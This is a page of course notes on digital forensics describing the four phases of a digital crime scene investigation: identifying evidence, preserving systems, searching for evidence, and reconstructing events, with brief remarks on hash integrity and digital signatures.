Notes - MCS
Computer Systems Forensic Analysis
Notes - MCS
Computer Systems Forensic Analysis
  • Computer Systems Forensic Analysis
  • Overview of Cybercrime
    • Cyberspace
    • Information Security Principles
    • Cybercrime vs. Computer Crime
    • Cybercrime slang
      • Images
    • Digital Evidence
  • Introduction to Digital Forensics
    • Concepts
    • Digital Forensic
    • Digital Investigation
    • Digital Crime Scene Investigation Methodology
    • Digital Evidence Handling
    • Ethical Code
  • Obtaining Evidences
    • Introduction
    • Boot Process
    • Secuere Boot Process
    • Windows Boot Process
    • Forensic Boot Tools
    • Bootable CD-ROMS - Linux Based
    • ADS
    • Forensic Sorting Tools
    • Forensic Acquisition
    • Dealing With Media Errors
    • Hidden Areas
    • Write Protection of Evidence Media
    • Storing Acquired Data
    • Image File Acquisition
    • Hash Values
  • Data Organization
    • Data Organization
    • File System
    • File Content
    • Endianness
    • Character Encoding
    • Data Structures
    • Date and Time
    • Encoding
  • Storage Devices
    • BIOS versus direct access
    • Hard Disk Geometry
    • Advanced Technology Attachment Interface
      • Device Configuration Overlay
    • Small Computer Systems Interface
    • NAND Flash memory
    • Level wearing
    • HDD vs SSD
    • Pen USB vs SSD Comparison
    • SSD Connectors, Interfaces, and Transfer Protocols
  • Volumes and Partitions
    • Concepts
    • Partition Tables
    • Sectors Addresses
    • Logical addresses
    • Volume Analysis
    • Types of Partition Tables
    • Common Partition Tables (MBR)
    • Boot Code
    • MBR examination
    • Removable Storage
    • Common Partition Tables (GPT)
    • Common Partition Tables (BSD)
    • Volumes’ Aggregation
  • RAM Analysis
    • RAM Analysis
    • General Computer Architecture
    • DMA – Direct Memory Access
    • Paging
    • Memory Acquisition
  • Mobile Forensics
    • Forensic value of phones
    • International Mobile Equipment Identifier
    • Potential Evidence
    • Forensics Dangers
    • Data Acquisition
    • Logical acquisition
    • Physical acquisition
    • Hashing
    • Software tools
  • Open Source INTelligence
    • Classical sources of information and intelligence
    • Evolution of OSINT - Open Sources Intelligence
    • Information sources
    • Closed source of information
    • Open sources
    • Information to Intelligence Cycle
    • Skills of the Analyst
    • Open Source Possibilities
    • Automated Processing
    • DarkNet
  • Documentation and Reporting
    • Introduction
    • Physical examination
    • Examining a computer
    • Media Examination
    • Examples of things to write in the report
    • Forensic Report
Powered by GitBook
On this page
  • Investigation process
  • Phase 1 - Identify The Source of the Digital Evidence
  • Phase 2 - System Preservation
  • Goals
  • Actions vary depending on the legal, business, or operational requirements of the investigation.
  • Preservation Techniques
  • Data Integrity
  • Phase 3 - Evidence Searching
  • Searching Process
  • Searching Techniques
  • Phase 4 - Event Reconstruction
  1. Introduction to Digital Forensics

Digital Crime Scene Investigation Methodology

Last updated 1 year ago

Investigation process

There is no single way to conduct an investigation.

It does not matter which process is used.

  • As long as we find the right person and do not break any laws in the process.

However, some are more efficient than others.

The four major phases – based on the physical crime scene investigation process

Phase 1 - Identify The Source of the Digital Evidence

  • Physically identifying the origin of the digital evidence.

  • Choose the best approach to analyze it.

  • Equipment seizure.

Phase 2 - System Preservation

Goals

  • preserve the state of the digital crime scene.

  • reduce the amount of evidence that may be lost.

Actions vary depending on the legal, business, or operational requirements of the investigation.

  • legal requirements may cause you to unplug the system and make a full copy of all data or,

  • could be a case involving a spyware infection or a honeypot and no preservation is performed,

  • if it’s not going to court, techniques in between can be used.

Preservation Techniques

Post-mortem Analysis

  • pull the plug to reduce the amount of evidence that is overwritten.

  • make duplicate copies of all data.

  • use write blockers to prevent evidence from being overwritten.

Live Analysis

  • kill or suspend suspect processes unplug or limit network connection.

    • use an empty hub or switch to prevent log messages about a dead link.

    • use network filters to avoid a remote connection from perpetrator to delete data.

  • backup important data (logs, files, etc)

Data Integrity

When important data are saved during a post-mortem or live analysis, a cryptographic hash should be calculated to later show that the data have not changed.

MD5 Cryptographic Hash

  • this algorithm is broken since 2004.

  • use only for retro compatibility purposes.

Hash values by itself are not enough.

  • given a message M, its hash value is H(M) = h.

  • someone can change both M and h, because h doesn’t depend on a secret.

Possible solution:

  • Digital Signatures.

    • depends on a private key.

    • better if done with a secure device.

Phase 3 - Evidence Searching

  • Goal: find data that support or refute hypotheses about an incident.

  • Typically starts with a survey of common locations based on the type of incident:

    • Web-browsing habits: look at the Web browser cache, history file, and bookmarks.

    • Linux intrusion: look for signs of a rootkit or new user accounts.

It is important to look also for evidence that refutes your hypothesis instead of only looking for evidence that only supports your hypothesis.

Searching Process

  1. define the general characteristics of the object for which we are searching.

  2. look for that object in a collection of data.

  3. two key steps:

    1. determining for what we are looking.

    2. where we expect to find it.

Searching Techniques

Most searching for evidence is done in a file system and inside files.

Search for files based on:

  • Their names, or patterns in their names.

  • A keyword in their content.

  • Temporal data, such as the last accessed or written time.

  • Hash values and compare them against a database.

Analyzing network data based on:

  • Packet headers, such as IP addresses, port number, protocol, ...

  • Keywords inside packets content.

Phase 4 - Event Reconstruction

Goal: try to answer questions about digital events in the system.

During the Evidence Searching Phase we might find several files that violate a law.

  • But it doesn’t answer questions about events.

  • The file may have been the effect of an event, but what application downloaded it? a web browser? a malicious software? - several cases have used malware as a defense.

  • It may be possible to correlate the digital events with physical events.

Event reconstruction requires knowledge about the applications and the OS that are installed on the system so that you can create hypotheses based on their capabilities.

it is possible to create collisions – different files with the same hash value .

Allows to find all files of a given type even if someone has changed their name .

examples
National Software Reference Library (NSRL) database
Cryptographic hash algorithms